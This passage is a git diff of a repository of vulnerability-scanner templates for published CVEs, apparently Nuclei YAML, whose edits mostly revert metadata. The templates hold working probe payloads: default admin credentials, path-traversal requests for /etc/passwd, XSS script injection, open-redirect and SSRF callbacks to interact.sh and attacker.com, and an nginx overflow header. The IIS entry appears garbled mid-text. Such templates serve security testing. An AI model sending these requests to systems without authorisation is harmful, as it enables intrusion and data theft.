http://www.networkscanning.com/Horde-Default-Admin-Password-Vulnerability-VSS_20171.html - - https://exchange.xforce.ibmcloud.com/vulnerabilities/24576 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cvss-score: 10 cve-id: CVE-2005-3344 - cwe-id: NVD-CWE-Other - epss-score: 0.02158 - epss-percentile: 0.88203 - cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: horde - product: horde - tags: cve2005,cve,horde,unauth -http: +requests: - method: GET path: - "{{BaseURL}}/horde/admin/user.php" - "{{BaseURL}}/admin/user.php" - headers: Content-Type: text/html matchers-condition: and matchers: + - type: word words: - "Horde :: User Administration" + condition: and - type: status status: - 200 -# digest: 490a0046304402200f6ab7e5b811ae50b7feb5a05fd7996c735219dbe8a152b9c4cfd263af7405d6022054184a20298d9717f3c6263e0ca1083caa2941df71af109b0f69013ab683cec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/18 diff --git a/poc/cve/cve-2010-0219.yaml b/poc/cve/cve-2010-0219.yaml index 162fed1a75..9e44b7dcc9 100644 --- a/poc/cve/cve-2010-0219.yaml +++ b/poc/cve/cve-2010-0219.yaml @@ -3,34 +3,16 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: critical + severity: high description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. - remediation: | - Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. + tags: cve,cve2010,axis,apache,default-login,axis2 reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - - http://www.rapid7.com/security-center/advisories/R7-0037.jsp - - http://www.vupen.com/english/advisories/2010/2673 - - http://retrogod.altervista.org/9sg_ca_d2d.html classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cvss-score: 10 cve-id: CVE-2010-0219 - cwe-id: CWE-255 - epss-score: 0.97509 - epss-percentile: 0.99981 - cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: apache - product: axis2 - shodan-query: http.html:"Apache Axis" - tags: cve,cve2010,axis,apache,default-login,axis2 -http: +requests: - raw: - | POST /axis2-admin/login HTTP/1.1 @@ -38,6 +20,7 @@ http: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} + - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -54,6 +37,7 @@ http: matchers-condition: and matchers: + - type: word words: - "

Welcome to Axis2 Web Admin Module !!

" @@ -61,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/02 diff --git a/poc/cve/cve-2016-1000136.yaml b/poc/cve/cve-2016-1000136.yaml index f6b6733834..3adf484b9b 100644 --- a/poc/cve/cve-2016-1000136.yaml +++ b/poc/cve/cve-2016-1000136.yaml @@ -8,13 +8,12 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 - - https://wordpress.org/plugins/heat-trackr + tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-1000136 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2016-3978.yaml b/poc/cve/cve-2016-3978.yaml index 9c1dd44d28..ac3ab10ad8 100644 --- a/poc/cve/cve-2016-3978.yaml +++ b/poc/cve/cve-2016-3978.yaml @@ -1,41 +1,27 @@ id: CVE-2016-3978 info: - name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting + name: FortiOS (Fortinet) - Open Redirect and XSS author: 0x_Akoko severity: medium - description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." - impact: | - Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. - remediation: | - Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. + description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." reference: - - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability + - https://seclists.org/fulldisclosure/2016/Mar/68 - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - - http://seclists.org/fulldisclosure/2016/Mar/68 - - http://www.securitytracker.com/id/1035332 + tags: cve,cve2016,redirect,fortinet,fortios classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2016-3978 cwe-id: CWE-79 - epss-score: 0.00217 - epss-percentile: 0.59667 - cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fortinet - product: fortios - tags: cve2016,cve,redirect,fortinet,fortios,seclists -http: +requests: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.interact.sh' + - '{{BaseURL}}/login?redir=http://www.example.com' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2017-11512.yaml b/poc/cve/cve-2017-11512.yaml index 8b2924e2e0..095801ddf9 100644 --- a/poc/cve/cve-2017-11512.yaml +++ b/poc/cve/cve-2017-11512.yaml @@ -6,33 +6,22 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. - impact: | - An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. - remediation: | - Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.tenable.com/security/research/tra-2017-31 + - https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-11512 cwe-id: CWE-22 - epss-score: 0.97175 - epss-percentile: 0.99794 - cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: - verified: true - max-request: 2 - vendor: manageengine - product: servicedesk shodan-query: http.title:"ManageEngine" + verified: "true" tags: cve,cve2017,manageengine,lfr,unauth,tenable -http: +requests: - method: GET path: - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' @@ -47,4 +36,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/09 diff --git a/poc/cve/cve-2017-18598.yaml b/poc/cve/cve-2017-18598.yaml index b7393b1790..d030fe66cd 100644 --- a/poc/cve/cve-2017-18598.yaml +++ b/poc/cve/cve-2017-18598.yaml @@ -1,62 +1,34 @@ -id: CVE-2017-18598 - -info: - name: WordPress Qards - Cross-Site Scripting - author: pussycat0x - severity: medium - description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. - remediation: | - Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability. - reference: - - https://wpscan.com/vulnerability/8934 - - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 - - https://wpvulndb.com/vulnerabilities/8934 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 - - https://github.com/ARPSyndicate/cvemon +id: CVE-2017-18598 + +info: + name: Qards Plugin - Stored XSS and SSRF + author: pussycat0x + severity: medium + description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php + reference: + - https://wpscan.com/vulnerability/8934 + - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18598 + tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2017-18598 cwe-id: CWE-79 - epss-score: 0.00094 - epss-percentile: 0.38554 - cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: designmodo - product: qards - framework: wordpress - tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo - -flow: http(1) && http(2) - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - internal: true - words: - - '/wp-content/plugins/qards/' - - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - part: body - words: - - "console.log" -# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - "console.log" \ No newline at end of file diff --git a/poc/cve/cve-2017-5631.yaml b/poc/cve/cve-2017-5631.yaml index 8f0b35c820..6dcc26746a 100644 --- a/poc/cve/cve-2017-5631.yaml +++ b/poc/cve/cve-2017-5631.yaml @@ -1,35 +1,21 @@ id: CVE-2017-5631 info: - name: KMCIS CaseAware - Cross-Site Scripting + name: CaseAware - Cross Site Scripting author: edoardottt severity: medium - description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. - impact: | - Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. - remediation: | - To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. + description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. reference: - - https://www.openbugbounty.org/incidents/228262/ - - https://www.exploit-db.com/exploits/42042/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65504 - cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: kmc_information_systems - product: caseaware - tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems + tags: cve,cve2017,xss,caseaware -http: +requests: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -49,4 +35,3 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2017-7269.yaml b/poc/cve/cve-2017-7269.yaml new file mode 100644 index 0000000000..07f7419224 --- /dev/null +++ b/poc/cve/cve-2017-7269.yaml @@ -0,0 +1,45 @@ +id: CVE-2017-7269 + +info: + name: Windows Server 2003 & IIS 6.0 - Remote Code Execution + author: thomas_from_offensity,geeknik + severity: critical + description: | + Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL + - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV + - regex(".*?PROPFIND", public) # lowercase header name: Public + - regex(".*?PROPFIND", allow) # lowercase header name: Allow + condition: or + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-7529.yaml b/poc/cve/cve-2017-7529.yaml index b05d81075d..63d93927e1 100644 --- a/poc/cve/cve-2017-7529.yaml +++ b/poc/cve/cve-2017-7529.yaml @@ -1,29 +1,27 @@ id: CVE-2017-7529 + info: - author: "Harsh Bothra" - name: "Nginx Remote Integer Overflow" + name: Nginx Remote Integer Overflow + author: medbsq severity: medium -# This template supports the detection part only. -# Do not test any website without permission -# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py - +# https://www.cvebase.com/cve/2017/7529 requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Range: bytes=-17208,-9223372036854758792 - Connection: close - + - method: GET + path: + - "{{BaseURL}}/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Range: bytes=-17208,-9223372036854758792 matchers-condition: and matchers: + - type: word + words: + - "Server: nginx" + - "Content-Range" + condition: and + part: header - type: status status: - 206 - - type: word - words: - - Content-Range - part: all \ No newline at end of file diff --git a/poc/cve/cve-2017-9833.yaml b/poc/cve/cve-2017-9833.yaml index fcdf436a30..ed4f48506c 100644 --- a/poc/cve/cve-2017-9833.yaml +++ b/poc/cve/cve-2017-9833.yaml @@ -5,31 +5,17 @@ info: author: 0x_Akoko severity: high description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. - impact: | - An attacker can gain unauthorized access to sensitive files on the server. - remediation: | - Upgrade to a patched version of BOA Web Server or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42290 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 - - https://pastebin.com/raw/rt7LJvyF - - https://www.exploit-db.com/exploits/42290/ - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2017-9833 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 cve-id: CVE-2017-9833 cwe-id: CWE-22 - epss-score: 0.7354 - epss-percentile: 0.98027 - cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: boa - product: boa - tags: cve,cve2017,boa,lfr,lfi,edb + tags: boa,lfr,lfi,cve,cve2017 -http: +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" @@ -43,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/cve-2018-1000226.yaml b/poc/cve/cve-2018-1000226.yaml index 5eb5e5ebfa..c070e810a9 100644 --- a/poc/cve/cve-2018-1000226.yaml +++ b/poc/cve/cve-2018-1000226.yaml @@ -1,32 +1,21 @@ id: CVE-2018-1000226 info: - name: Cobbler - Authentication Bypass + name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass author: c-sh0 severity: critical - description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - epss-score: 0.01309 - epss-percentile: 0.8563 - cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cobblerd - product: cobbler - tags: cve2018,cve,cobbler,auth-bypass,cobblerd + tags: cve,cve2018,cobbler,auth-bypass -http: +requests: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 @@ -47,9 +36,9 @@ http: matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" + - type: status + status: + - 200 - type: word part: header @@ -61,12 +50,11 @@ http: words: - "" + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" - - - type: status - status: - - 200 -# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1000671.yaml b/poc/cve/cve-2018-1000671.yaml new file mode 100644 index 0000000000..d6302807a8 --- /dev/null +++ b/poc/cve/cve-2018-1000671.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-1000671 + +info: + name: Sympa version =>6.2.16 - Cross-Site Scripting + author: 0x_Akoko + severity: medium + description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + reference: + - https://github.com/sympa-community/sympa/issues/268 + - https://vuldb.com/?id.123670 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-1000671 + cwe-id: CWE-601 + metadata: + shodan-query: http.html:"sympa" + verified: "true" + tags: cve,cve2018,redirect,sympa,debian + +requests: + - method: GET + path: + - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/08/18 diff --git a/poc/cve/cve-2018-10956.yaml b/poc/cve/cve-2018-10956.yaml index a509b9736d..1cde241ed5 100644 --- a/poc/cve/cve-2018-10956.yaml +++ b/poc/cve/cve-2018-10956.yaml @@ -1,37 +1,23 @@ id: CVE-2018-10956 - info: - name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion + name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. author: 0x_Akoko severity: high - description: | - IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. - impact: | - An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. - remediation: | - Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. + description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb - - https://www.exploit-db.com/exploits/44916/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-10956 - - https://github.com/xbl3/awesome-cve-poc_qazbnm456 + - https://www.cvedetails.com/cve/CVE-2018-10956 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - epss-score: 0.57917 - epss-percentile: 0.97652 - cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: ipconfigure - product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" - tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure + tags: cve,cve2018,orchid,vms,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" @@ -45,4 +31,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12300.yaml b/poc/cve/cve-2018-12300.yaml index 94384ca163..aac189bfd8 100644 --- a/poc/cve/cve-2018-12300.yaml +++ b/poc/cve/cve-2018-12300.yaml @@ -1,39 +1,28 @@ id: CVE-2018-12300 info: - name: Seagate NAS OS 4.3.15.1 - Open Redirect + name: Seagate NAS OS 4.3.15.1 - Open redirect author: 0x_Akoko severity: medium - description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. - impact: | - Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. - remediation: | - Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. + description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 + - https://www.cvedetails.com/cve/CVE-2018-12300 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 cve-id: CVE-2018-12300 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.45685 - cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: seagate - product: nas_os - tags: cve2018,cve,redirect,seagate,nasos + tags: cve,cve2018,redirect,seagate,nasos -http: +requests: - method: GET + path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2018-1247.yaml b/poc/cve/cve-2018-1247.yaml index 4d0cf1ab7e..e522302ccb 100644 --- a/poc/cve/cve-2018-1247.yaml +++ b/poc/cve/cve-2018-1247.yaml @@ -4,7 +4,6 @@ info: name: RSA Authentication Manager XSS author: madrobot severity: medium - tags: cve,cve2018,xss,flash requests: - method: GET diff --git a/poc/cve/cve-2018-12675.yaml b/poc/cve/cve-2018-12675.yaml index 52e4353249..d1f5d24b6f 100644 --- a/poc/cve/cve-2018-12675.yaml +++ b/poc/cve/cve-2018-12675.yaml @@ -6,32 +6,21 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. - remediation: | - Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.44971 - cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: sv3c - product: h.264_poe_ip_camera_firmware + verified: "true" tags: cve,cve2018,redirect,sv3c,camera,iot -http: +requests: - method: GET path: - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' @@ -41,4 +30,5 @@ http: part: body words: - '' -# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by md on 2022/10/13 diff --git a/poc/cve/cve-2018-14918.yaml b/poc/cve/cve-2018-14918.yaml index 882b57bf37..4c75905015 100644 --- a/poc/cve/cve-2018-14918.yaml +++ b/poc/cve/cve-2018-14918.yaml @@ -6,33 +6,21 @@ info: severity: high description: | LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to 